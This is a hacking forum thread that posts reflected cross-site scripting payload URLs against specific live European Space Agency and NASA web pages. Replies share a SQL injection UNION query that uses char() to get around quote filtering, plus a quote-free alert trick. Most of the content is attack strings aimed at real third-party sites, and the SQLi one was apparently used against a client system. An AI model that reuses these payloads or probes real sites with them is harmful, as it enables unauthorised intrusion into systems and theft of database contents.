European Space Agency + NASA | XSS Vulns
#1
Code:
http://integral.esac.esa.int/cgi-scripts/cc/sgs_search_ccs.cgi?reference=<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>&version=v3.0&category_screw=XSS

Code:
http://www.rssd.esa.int/index.php?project=idis&page=people&action=Retrieve&searchString="><svg/onload=confirm('XSS')>[/url]

Code:
http://science.gsfc.nasa.gov/sed/index.cfm?fuseAction=home.main<svg/onload=alert('XSS')>
Reply
#2
Ah that's a clever way of getting around using quotes in XSS. I've done similar things in SQLi. Had a client stripping and sanitizing quotes but I got around it with char().

Code:
blogid=264+union+select+1,2,3,4,5,column_name,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22%20FROM%20information_schema.columns%20WHERE%20table_name=char(117,115,101,114)--
Reply
#3
(12-24-2015, 10:04 PM)NO-OP Wrote: Ah that's a clever way of getting around using quotes in XSS.  I've done similar things in SQLi.  Had a client stripping and sanitizing quotes but I got around it with char().

Code:
blogid=264+union+select+1,2,3,4,5,column_name,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22%20FROM%20information_schema.columns%20WHERE%20table_name=char(117,115,101,114)--

One way of getting around quotes for xss when alerting something is to simply use forward slashes instead. This method is often overlooked.

example: alert(/xss/) as an alternative to alert("xss")
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  [Tutorial] XSS through Exif headers Insider 1 563 06-16-2020, 11:51 AM
Last Post: LaZr4us
  Guide to XSS (Examples included) NO-OP 3 12,403 04-29-2019, 12:44 PM
Last Post: mhiats37
  [PoC] RunBox.com x MailChimp.com - Stored XSS Vulnerabilities (Bug Bounty Hunting) Daisuke Dan 3 5,768 04-24-2019, 08:47 PM
Last Post: thunder
  Exploiting Reflective XSS (Post) Insider 1 4,196 04-24-2019, 08:32 PM
Last Post: thunder